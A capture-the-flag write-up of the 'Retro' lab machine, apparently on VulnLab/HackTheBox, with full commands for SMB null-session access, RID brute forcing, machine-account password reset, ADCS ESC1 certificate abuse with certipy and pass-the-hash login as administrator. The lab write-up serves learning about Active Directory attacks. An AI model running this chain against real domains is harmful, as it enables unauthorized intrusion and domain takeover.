Retro - Writeup (VulnLab & HackTheBox)

shkzshkz
3 min read
██████╗░███████╗████████╗██████╗░░█████╗░
██╔══██╗██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
██████╔╝█████╗░░░░░██║░░░██████╔╝██║░░██║
██╔══██╗██╔══╝░░░░░██║░░░██╔══██╗██║░░██║
██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝
╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░

-----------------------------------------
Easy box with SMB null session for initial foothold, 
RID bruteforce to get hints of a machine account, 
password reset, and ESC1 abuse through ADCS to escalate to Domain Admin.

❄️ NMAP & INFO

53     → domain (Simple DNS Plus)  
88     → kerberos-sec (Microsoft Windows Kerberos)  
135    → msrpc (Microsoft Windows RPC)  
139    → netbios-ssn (Microsoft Windows netbios-ssn)  
389    → ldap (Microsoft Windows Active Directory LDAP)  
445    → microsoft-ds?  
464    → kpasswd5?  
593    → ncacn_http (Microsoft Windows RPC over HTTP 1.0)  
636    → ssl/ldap (Microsoft Windows Active Directory LDAP)  
3268   → ldap (Microsoft Windows Active Directory LDAP)  
3269   → ssl/ldap (Microsoft Windows Active Directory LDAP)  
3389   → ms-wbt-server (Microsoft Terminal Services)

❄️ FOOTHOLD

Since we don’t have any credentials yet, I started by bruteforcing Kerberos usernames using kerbrute, which revealed two valid accounts:

  • guest@retro.vl

  • administrator@retro.vl

An attempt at an RPC null session didn’t give me anything useful. So instead, I tried an SMB null session, this time assuming the guest account might allow anonymous access.

That folder Trainees looks interesting, we got Read permissions:

SMB | Null Session

Using smbclient.py:

smbclient.py DC.retro.vl/guest:''@10.129.172.145

After reading that note in the smb share, I tried to enumerate system accounts using RID bruteforcing with netexec:

nxc smb 10.129.172.145 -u guest -p '' --rid-brute

I built a list of possible usernames and ran a brute-force attack, which gave me valid credentials/access..

SMB | Trainee | flag.txt

If I enumerate again using the newly obtained credentials, we get access to a new shared resource called Notes, where we have read permissions. If we connect via SMB, we’ll find two files:

  • user.txt (our flag.txt)

  • ToDo.txt

    Bloodhound Time

    After reading the ToDo.txt file, I run an enumeration with bloodhound-python to visualize all possible objects in the AD:

bloodhound-python -u 'trainee' -p '<REDACTED>' -ns 10.129.172.145 -d 'retro.vl' -c all --dns-tcp --zip

Based on the hint mentioning an old pre-created machine account, I found a computer object named BANKING.RETRO.VL.

Knowing that machine accounts often use a default format like Banking$, I started testing a few common passwords with brute-force:

After reading that post, the STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT error means the machine account password was reset or set to a default (like its lowercase name) after being pre-created or reset in AD, so it’s out of sync and no longer trusted by the domain!

By running:

changepasswd.py retro.vl/'BANKING$':banking@10.129.172.145 -newpass '<REDACTED>' -dc-ip 10.129.172.145 -p rpc-samr

I was able to change the machine account password successfully. Impacket’s changepasswd.py script lets you change a user’s password using LDAP, kpasswd, SMB, or RPC. Both SMB and RPC use the SAMR protocol, but since we can’t access the IPC$ share with the default password (as already seen), we go with rpc-samr, which doesn’t require SMB session setup.

ADCS | PrivEsc

After reviewing BloodHound again and changing the password for BANKING$, I enumerate with netexec to check for ADCS and see if we can abuse any templates.

The result confirms there’s a PKI Enrollment Server at DC.retro.vl, and the Certificate Authority is retro-DC-CA.

ADCS | Finding Vulnerable Certificates

By running:

certipy find -vulnerable -u BANKING$@DC.retro.vl -p "<REDACTED>" -target 10.129.172.145 -dc-ip 10.129.172.145 -stdout

ESC1 Abuse

Now we can abuse ESC1 using certipy like this:

certipy req -u 'BANKING$'@retro.vl -p '<REDACTED>' -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.129.172.145 -target-ip 10.129.172.145 -key-size 4096

Then I extract the hash like this and log in as administrator via evil-winrm:

evil-winrm -i 10.129.172.145 -u Administrator -H '<HASH>'

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt

Pwned!

0
Subscribe to my newsletter

Read articles from shkz directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

shkz
shkz

I am shkz, a Security Researcher, Red Team and CTF Player.